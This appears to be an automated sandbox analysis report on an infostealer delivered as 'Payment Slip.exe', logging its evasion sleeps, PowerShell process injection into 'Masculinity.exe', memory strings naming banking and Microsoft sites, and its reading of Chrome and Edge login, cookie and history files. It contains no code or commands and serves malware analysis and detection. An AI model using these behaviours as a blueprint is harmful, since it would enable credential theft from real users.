Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -598172s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -598063s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -597938s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -597828s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -597719s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -597594s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -597484s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -597375s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -597266s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -597156s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -597047s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -596938s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -596813s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -596703s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -596594s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -596469s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -596359s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -596250s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -596141s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -596031s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -595922s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -595812s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -595703s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -595594s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -595469s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -595359s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -595250s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -595141s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -595030s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -594922s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -594812s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -594703s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -594594s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748 Thread sleep time: -594484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405770
Source: C:\Users\user\Desktop\Payment Slip.exe Code function: 0_2_0040622B FindFirstFileW,FindClose, 0_2_0040622B
Source: C:\Users\user\Desktop\Payment Slip.exe Code function: 0_2_0040276E FindFirstFileW, 0_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_0040276E FindFirstFileW, 7_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 7_2_00405770
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_0040622B FindFirstFileW,FindClose, 7_2_0040622B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 599063 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598953 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598719 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598609 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598500 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598391 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598281 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598172 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 598063 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597938 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597828 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597719 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597594 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597375 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597266 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597156 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 597047 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596938 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596813 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596594 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596250 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596141 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595922 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595812 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595703 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595594 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595469 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595359 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595250 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595141 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 595030 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 594922 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 594812 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Thread delayed: delay time: 594484 Jump to behavior
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3275528643.0000000004ACE000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3275528643.0000000004B25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\Payment Slip.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Payment Slip.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Code function: 7_2_04A69590 LdrInitializeThunk, 7_2_04A69590
Source: C:\Users\user\Desktop\Payment Slip.exe Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406252
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Masculinity.exe base: 1700000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Masculinity.exe base: 19FFF4 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Masculinity.exe "C:\Users\user\AppData\Local\Temp\Masculinity.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Masculinity.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment Slip.exe Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00405F0A
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Masculinity.exe PID: 528, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
